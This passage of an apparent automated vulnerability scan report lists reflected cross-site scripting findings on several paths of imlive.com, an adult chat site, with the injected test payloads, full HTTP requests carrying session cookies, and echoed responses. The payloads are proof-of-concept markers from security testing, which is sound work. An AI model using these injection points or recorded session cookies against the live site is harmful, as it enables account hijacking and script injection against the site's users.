Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:19 GMT
Connection: close
Content-Length: 29898
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/content.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-galleries/?cd9ca'-alert(1)-'52f7516f46a=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

2.111. http://imlive.com/live-sex-chats/sex-show-photos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/sex-show-photos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71e01'-alert(1)-'ba036a24c83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/sex-show-photos/?71e01'-alert(1)-'ba036a24c83=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:28 GMT
Connection: close
Content-Length: 25736
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/snapshotgallery.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-photos/?71e01'-alert(1)-'ba036a24c83=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

2.112. http://imlive.com/live-sex-chats/sex-show-photos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/sex-show-photos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36a69"><a>8ff796eb34d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/sex-show-photos/?36a69"><a>8ff796eb34d=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:18 GMT
Connection: close
Content-Length: 25588
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-show-photos/?36a69"><a>8ff796eb34d=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.113. http://imlive.com/live-sex-chats/sex-show-sessions/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/sex-show-sessions/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45e02'-alert(1)-'fb52648c8dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/sex-show-sessions/?45e02'-alert(1)-'fb52648c8dd=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:37 GMT
Connection: close
Content-Length: 26074
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/recordedlivesessions.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-sessions/?45e02'-alert(1)-'fb52648c8dd=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

2.114. http://imlive.com/live-sex-chats/sex-show-sessions/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/sex-show-sessions/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dabb"><a>3c523209842 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/sex-show-sessions/?1dabb"><a>3c523209842=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:07 GMT
Connection: close
Content-Length: 25926
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-show-sessions/?1dabb"><a>3c523209842=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.115. http://imlive.com/live-sex-chats/sex-video-features/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/sex-video-features/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80442'-alert(1)-'ebd4ed614b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/sex-video-features/?80442'-alert(1)-'ebd4ed614b9=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:37 GMT
Connection: close
Content-Length: 32369
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hotfeatures.aspx&he=imlive.com&ul=/live-sex-chats/sex-video-features/?80442'-alert(1)-'ebd4ed614b9=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

2.116. http://imlive.com/live-sex-chats/sex-video-features/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/sex-video-features/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2028a"><a>c334382ea0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/sex-video-features/?2028a"><a>c334382ea0e=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:29 GMT
Connection: close
Content-Length: 32222
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-video-features/?2028a"><a>c334382ea0e=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.117. http://imlive.com/live-sex-chats/shemale-couple/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/shemale-couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f758'-alert(1)-'be71a5fa912 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/shemale-couple/?9f758'-alert(1)-'be71a5fa912=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:06 GMT
Connection: close
Content-Length: 92716
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shemale-couple/?9f758'-alert(1)-'be71a5fa912=1&qs=cat=1^roomid=557^9f758'-alert(1)-'be71a5fa912=1&qs=cat=1^roomid=557^9f758'-alert(1)-'be71a5fa912=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63
...[SNIP]...

2.118. http://imlive.com/live-sex-chats/shemale-couple/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/shemale-couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52e5c"><a>069e897b555 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/shemale-couple/?52e5c"><a>069e897b555=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
